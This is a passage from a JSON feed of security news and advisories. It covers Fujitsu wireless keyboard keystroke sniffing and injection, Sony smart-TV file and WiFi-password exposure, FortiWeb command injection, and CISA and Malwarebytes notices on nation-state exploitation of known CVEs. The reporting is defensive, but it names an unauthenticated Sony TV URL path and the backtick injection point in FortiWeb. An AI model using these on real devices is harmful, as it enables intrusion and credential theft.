SySS, in an advisory [sent to Threatpost on Wednesday](<https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-011.txt>). \u201cSySS recommends replacing LX390 wireless keyboard sets used in environments with higher security demands, for instance with one of the newer successor models LX410 or LX960.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Fujitsu [Wireless Keyboard Set LX390](<https://www01.cp-static.com/objects/pdf/e/e2e/1349166666_1_toetsenborden-fujitsu-lx390-s26381-k590-l480.pdf>) desk set consists of a mouse and a keyboard. The wireless keyboard transmits keystrokes to the desktop wirelessly using a 2.4 GHz-range transceiver.\n\nIt\u2019s that data communication between the wireless keyboard and desktop where the vulnerabilities stem from; the LX390 does not use encryption for transmitting data packets that contain keyboard events, like keystrokes. Instead, the keyboard aims to secure any communicated data using a mechanism called \u201cdata whitening,\u201d which essentially scrambles the data in a certain configuration.\n\nHowever, because the data isn\u2019t encrypted, it can still be accessed and analyzed by an attacker who is up to 150 feet away (the [typical reach](<https://www.lifewire.com/range-of-typical-wifi-network-816564>) of devices using 2.4 GHz radio frequency).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/10/23130539/fujitsu.jpg>)\n\nResearchers were able to sniff out and analyze the radio communication using a software tool (the [Universal Radio Hacker](<https://github.com/jopohl/urh>)), to then unscramble the data-whitening configuration. That allowed them to view the data packet contents \u2013 which, Deeg said, could lead to two proof-of-concept (PoC) attacks.\n\nFirst of all, with access to the data packets, researchers were able to scope out keystrokes, such as passwords being entered into the wireless keyboard (CVE-2019-18201).\n\n\u201cWith this knowledge, an attacker can remotely analyze and decode sent keyboard events of a Fujitsu LX390 keyboard as cleartext, for instance keystrokes, and thus gain unauthorized access to sensitive data like passwords,\u201d said Deeg.\n\nIn another PoC attack, researchers were able to launch keystroke injections (CVE-2019-18200), which is an attack where hackers could send their own data packets to the wireless keyboard device, which in turn generates keystrokes on the host computer (which would need to have a screen that\u2019s already unlocked and unattended).\n\nAttackers from the short distance away could use keystroke injection attacks for all sorts of malicious purposes \u2013 the worst being the installation of malware, including dangerous rootkits. In order to send data packets in this proof-of-concept attack, researchers used a software-defined radio in combination with an in-house developed software tool utilizing [GNU Radio](<https://www.gnuradio.org/>).\n\nBoth flaws were reported to the manufacturer in April 2019. Fujitsu did not immediately respond to a request for comment from Threatpost.\n\nIt\u2019s not the first Fujitsu wireless keyboard flaw to be found; in March [Fujitsu stopped sales](<https://threatpost.com/unpatched-fujitsu-wireless-keyboard-bug-allows-keystroke-injection/142847/>) for its popular wireless keyboard after a researcher discovered it is vulnerable to keystroke injection attacks that could allow an adversary to take control of a victim\u2019s system.\n\nThese types of attacks have garnered attention since 2016, when the [Mousejack vulnerability](<https://threatpost.com/mousejack-attacks-abuse-vulnerable-wireless-keyboard-mouse-dongles/116402/>) raised awareness of the potential risks introduced by a wireless mouse or keyboard to the enterprise. In April [2018,](<https://threatpost.com/microsoft-fixes-66-bugs-in-april-patch-tuesday-release/131127/>) Microsoft patched a Wireless Keyboard 850 security feature bypass vulnerability ([CVE-2018-8117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8117>)); while in December 2018 Logitech patched a bug could have allowed adversaries to launch keystroke [injection attacks](<https://threatpost.com/logitech-keystroke-injection-flaw/139928/>) against Logitech keyboard owners that used its app.\n\n\u201cAccording to our research results of the last three years, several wireless input devices like wireless desktop sets and wireless presenter using proprietary non-Bluetooth 2.4 GHz communication had some severe security issues allowing for replay, keystroke injection, and sometimes even keystroke sniffing attacks,\u201d Deeg told Threatpost.\n\n_**What are the top cybersecurity issues associated with privileged account access and credential governance? Experts from Thycotic on Oct. 23 will discuss during our upcoming free **_[_**Threatpost webinar**_](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)_**, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d **_[_**Click here to register**_](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-23T18:03:45", "type": "threatpost", "title": "Fujitsu Wireless Keyboard Plagued By Unpatched Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-8117", "CVE-2019-18200", "CVE-2019-18201", "CVE-2020-0688"], "modified": "2019-10-23T18:03:45", "id": "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "href": "https://threatpost.com/fujitsu-wireless-keyboard-unpatched-flaws/149477/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:18", "description": "Two vulnerabilities in Android-based smart-TVs from Sony, including the flagship Bravia line, could allow attackers to access WiFi passwords and images stored on the devices.\n\nThe bugs exist in the Photo Sharing Plus feature of Sony smart-TVs going back to 2015. They were uncovered by xen1thLabs in October; Sony in response [has removed](<https://www.sony.com/electronics/support/televisions-projectors/articles/00204331>) the vulnerable application from all new models and the bugs were disclosed on Monday.\n\nIt\u2019s important to remember that the vulnerabilities exist not only in homes but also in companies and organizations where smart TVs are used in conference and meeting rooms, widening the scope of the threat surface.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe Photo Sharing Plus application allows the uploading of pictures and multimedia from a smartphone to a TV, in order to show content in a slideshow format. The first vulnerability (CVE-2019-11336) allows an attacker, without authentication, to retrieve the WiFi password created by the television when the Photo Sharing Plus application is started. The second (CVE-2019-10886) allows an attacker to read arbitrary files, including images, located within the TV\u2019s software, without authentication.\n\nOn the first point, when started, the app essentially turns the TV into a WiFi access point and shows a WiFi password that allows customers to connect and share their media content, according to xen1thLabs. It\u2019s possible for an attacker to retrieve this password in plaintext from the logs kept in the Photo Sharing Plus API, according to the researchers, which is reachable via the home network or corporate LAN and which has no access restrictions on it.\n\nThe second bug opens up internal smart-TV files to cyberattackers: \u201cBy default, images used by the Photo Sharing Plus application are stored inside \u2018/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/\u2019,\u201d explained the team, in [an advisory](<https://www.darkmatter.ae/blogs/security-flaws-uncovered-in-sony-smart-tvs/>) this week. \u201cThe application initiates an access point on the television and a HTTP daemon is listening to a TCP port on the newly created WLAN. Furthermore, this daemon also listens on the LAN side of the television, and it is possible to retrieve these images from the LAN an image using [a hardcoded URL without authentication].\u201d\n\nFurther, browsing to the hard-coded web address \u201chttp://[ip_tv]:10000/contentshare/image/\u201d allows access to the Android-based root directory of the television, along with its default property files; these include the wireless password for the television.\n\nIn either case, attackers could upload their own content or pilfer content from the TV owners.\n\nTo be clear, an adversary would need to first access the network in order to exploit either vulnerability \u2013 so the attack would be local or require a multi-stage effort involving gaining remote network access.\n\nA list of affected models can be found [here](<https://www.sony.com/electronics/support/televisions-projectors/articles/00204331>) \u2013 the list is not comprehensive, according to xen1thLabs.\n\nThis is not the first issue for Sony TVs and Photo Sharing Plus. In October, security researchers revealed that eight Sony Bravia smart TV models [were vulnerable](<https://threatpost.com/sony-smart-tv-bug-allows-remote-access-root-privileges/138063/>) to a command-injection (CVE-2018-16593) bug tied to Photo Sharing Plus.\n\n\u201cThis application handles file names incorrectly when the user uploads a media file,\u201d wrote Fortinet\u2019s Tony Loi at the time, who found the vulnerability. \u201cAn attacker can abuse such filename mishandling to run arbitrary commands on the system, which can result in complete remote code-execution with root privilege.\u201d\n\nThe bugs illustrate the snowballing threat surface of smart devices and the internet of things (IoT), and the need for more awareness on the part of consumers and businesses alike.\n\n\u201cAny one of the billions of devices connected to a network, no matter how small, could be a target for hackers looking for a vulnerable path to a network or as part of a more widespread attack on a particular device type or channel,\u201d said Gil Bernabeu, technical director at GlobalPlatform, in [a recent blog](<https://globalplatform.org/is-it-impossible-to-securely-manage-the-billions-of-things-in-the-iot-ecosystem-2/?utm_source=iseepr&utm_medium=Blog&utm_campaign=SecureComponent>) on IoT security. \u201cAs the number and nature of use cases grow, so too do the risks.\u201d\n", "cvss3": {}, "published": "2019-04-25T21:13:31", "type": "threatpost", "title": "Android-Based Sony Smart-TVs Open to Image Pilfering", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-16593", "CVE-2019-10886", "CVE-2019-11336", "CVE-2020-0688"], "modified": "2019-04-25T21:13:31", "id": "THREATPOST:24AD38597408C4E7757770D45345AEBA", "href": "https://threatpost.com/android-sony-smart-tvs/144133/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T20:47:20", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as [CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. However, Rapid7 researchers identified less than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of the our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. \u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used for to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. ET with a statement from Fortinet.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T12:07:33", "type": "threatpost", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-18T12:07:33", "id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-09-29T18:14:37", "description": "CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a [Joint Cybersecurity Advisory (CSA)](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>) on Russian Foreign Intelligence Service (SVR) actors scanning for and exploiting vulnerabilities to compromise U.S. and allied networks, including national security and government-related systems.\n\nSpecifically, SVR actors are targeting and exploiting the following vulnerabilities:\n\n * [CVE-2018-13379 Fortinet FortiGate VPN](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [CVE-2019-9670 Synacor Zimbra Collaboration Suite](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>)\n * [CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CVE-2019-19781 Citrix Application Delivery Controller and Gateway](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [CVE-2020-4006 VMware Workspace ONE Access](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>)\n\nAdditionally the White House has released a [statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) formally attributing this activity and the SolarWinds supply chain compromise to SVR actors. CISA has updated the following products to reflect this attribution:\n\n * [Alert AA20-352A: APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * [Alert AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool](<https://us-cert.cisa.gov/ncas/alerts/aa21-077a>)\n * [Malware Analysis Report AR21-039A: MAR-10318845-1.v1 - SUNBURST](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a>)\n * [Malware Analysis Report AR21-039B: MAR-10320115-1.v1 - TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>)\n * Table: SolarWinds and Active Directory/M365 Compromise - Detecting APT Activity from Known TTPs\n * [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise web page](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * [Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise](<https://cyber.dhs.gov/ed/21-01/>)\n\nCISA strongly encourages users and administrators to review [Joint CSA: Russian SVR Targets U.S. and Allied Networks](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) for SVR tactics, techniques, and procedures, as well as mitigation strategies.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-15T00:00:00", "type": "cisa", "title": "NSA-CISA-FBI Joint Advisory on Russian SVR Targeting U.S. and Allied Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-09-28T00:00:00", "id": "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:52", "description": "Microsoft Exchange Servers affected by a remote code execution vulnerability, known as CVE-2020-0688, continue to be an attractive target for malicious cyber actors. A remote attacker can exploit this vulnerability to take control of an affected system that is unpatched.\n\nAlthough Microsoft disclosed the vulnerability and provided software patches for the various affected products in February 2020, advanced persistent threat actors are targeting unpatched servers, according to recent open-source reports. The Cybersecurity and Infrastructure Security Agency (CISA) urges users and administrators review [Microsoft\u2019s Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) and the [National Security Agency\u2019s tweet](<https://twitter.com/NSAGov/status/1236099750610563074>) on CVE-2020-0688 for more information and apply the necessary patches as soon as possible.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-10T00:00:00", "type": "cisa", "title": "Unpatched Microsoft Exchange Servers Vulnerable to CVE-2020-0688", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-03-10T00:00:00", "id": "CISA:18E5825084F7681AD375ACB5B1270280", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-02T18:11:09", "description": "The Federal Bureau of Investigation (FBI) and CISA have released a [Joint Cybersecurity Advisory](<https://www.ic3.gov/Media/News/2021/210402.pdf>) (CSA) to warn users and administrators of the likelihood that advanced persistent threat (APT) actors are actively exploiting known Fortinet FortiOS vulnerabilities [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>), [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), and [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>). APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. Gaining initial access pre-positions the APT actors to conduct future attacks.\n\nCISA encourages users and administrators to review [Joint CSA AA21-092A: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>) and implement the recommended mitigations.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T00:00:00", "type": "cisa", "title": "FBI-CISA Joint Advisory on Exploitation of Fortinet FortiOS Vulnerabilities ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-04-02T00:00:00", "id": "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories&#x27; executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won&#x27;t be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 